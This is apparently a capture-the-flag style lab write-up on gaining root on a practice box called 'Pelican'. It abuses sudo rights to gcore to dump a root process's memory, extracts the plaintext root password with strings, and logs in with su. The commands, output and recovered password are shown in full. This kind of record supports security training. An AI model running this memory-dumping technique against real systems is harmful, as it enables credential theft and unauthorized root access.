InfoSec LAB

Pelican_Privilege_Escalation

Created: 2 min read

sudo gcore

The charles user has sudo privileges to execute the /usr/bin/gcore command as anyone without getting prompted for password

charles@pelican:/var/tmp$ ps ps -auxwww | grep -i password
root       490  0.0  0.0   2276   128 ?        Ss   17:21   0:00 /usr/bin/password-store

There was this unknown SUID binary being executed by the root account Based on the naming alone, I would assume that it restores password Since it’s executed by the root account, I might be able to leverage the sudo privilege to read into the process

charles@pelican:/var/tmp$ sudo -u root /usr/bin/gcore 490
0x00007fec7ea386f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffd84db2450, remaining=remaining@entry=0x7ffd84db2450) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28	../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.490
[Inferior 1 (process 490) detached]

Dumping the process info

charles@pelican:/var/tmp$ sudo -u root /usr/bin/gcore 490
sudo -u root /usr/bin/gcore 490
0x00007fec7ea386f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffd84db2450, remaining=remaining@entry=0x7ffd84db2450) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28	../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.490
[Inferior 1 (process 490) detached]
charles@pelican:/var/tmp$ strings core.490
strings core.490
CORE
password-store
/usr/bin/password-store 
CORE
CORE
/usr/bin/passwor
////////////////
LINUX
/usr/bin/passwor
////////////////
IGISCORE
CORE
ELIFCORE
/usr/bin/password-store
/usr/bin/password-store
/usr/lib/x86_64-linux-gnu/libc-2.28.so
/usr/lib/x86_64-linux-gnu/libc-2.28.so
/usr/lib/x86_64-linux-gnu/ld-2.28.so
/usr/lib/x86_64-linux-gnu/ld-2.28.so
fork failed!
/tmp
 
[...REDACTED...]
 
linux-vdso.so.1
tls/x86_64/x86_64/tls/x86_64/
/lib/x86_64-linux-gnu/libc.so.6
/usr/bin/passwor
////////////////
/usr/bin/passwor
////////////////
001 Password: root:
ClogKingpinInning731
x86_64
/usr/bin/password-store
HOME=/root
LOGNAME=root
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/root
/usr/bin/password-store
 
[...REDACTED...]

There is a string that appears to be the password for the root account;ClogKingpinInning731

charles@pelican:/var/tmp$ su root
Password: ClogKingpinInning731
 
root@pelican:/var/tmp# whoami
root
root@pelican:/var/tmp# hostname
pelican
root@pelican:/var/tmp# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:09:fe brd ff:ff:ff:ff:ff:ff
    inet 192.168.132.98/24 brd 192.168.132.255 scope global noprefixroute ens192
       valid_lft forever preferred_lft forever

It indeed belongs to the root account System level compromise

Interactive Graph View

Backlinks